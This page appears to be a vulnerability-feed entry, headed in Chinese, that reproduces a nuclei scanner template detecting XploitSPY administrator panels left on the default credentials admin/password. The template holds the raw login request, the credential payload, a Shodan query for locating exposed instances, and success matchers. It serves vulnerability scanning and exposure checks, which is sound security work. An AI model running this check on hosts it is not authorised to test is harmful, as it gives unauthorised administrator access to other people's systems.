xploitspy-default-login: XploitSPY - Default Login

日期: 2025-08-01 | 影响软件: XploitSPY | POC: 已公开

漏洞描述

Default login and password to access administrator panel

PoC代码[已公开]

id: xploitspy-default-login

info:
  name: XploitSPY - Default Login
  author: andreluna
  severity: high
  description: |
    Default login and password to access administrator panel
  reference:
    - https://github.com/XploitWizer-Community/XploitSPY
  metadata:
    max-request: 1
    shodan-query: html:XploitSPY
  tags: xploitspy,default-login,vuln

http:
  - raw:
      - |
        POST /login HTTP/1.1
        Host: {{Hostname}}
        Origin: {{RootURL}}
        Content-Type: application/x-www-form-urlencoded
        Referer: {{RootURL}}/login

        username={{user}}&password={{pass}}&hostname={{Hostname}}

    attack: pitchfork
    payloads:
      user:
        - admin
      pass:
        - password
    redirects: true
    max-redirects: 2

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - "Change Password"
          - "Logout"
          - "XploitSPY"
        condition: and

      - type: status
        status:
          - 200
# digest: 490a0046304402204bc6556accb96ce20d491d2dce90b2226146f46487c8b069c41bbf2765cee41b02204bd7d9465f31e731831e81bf1c6ec6d7917df2bb35a8bd3f5c47257eea72ddc4:922c64590222798bb761d5b6d8e72950
来源: https://github.com/projectdiscovery/nuclei-templates/blob/main/http/default-logins/xploitspy/xploitspy-default-login.yaml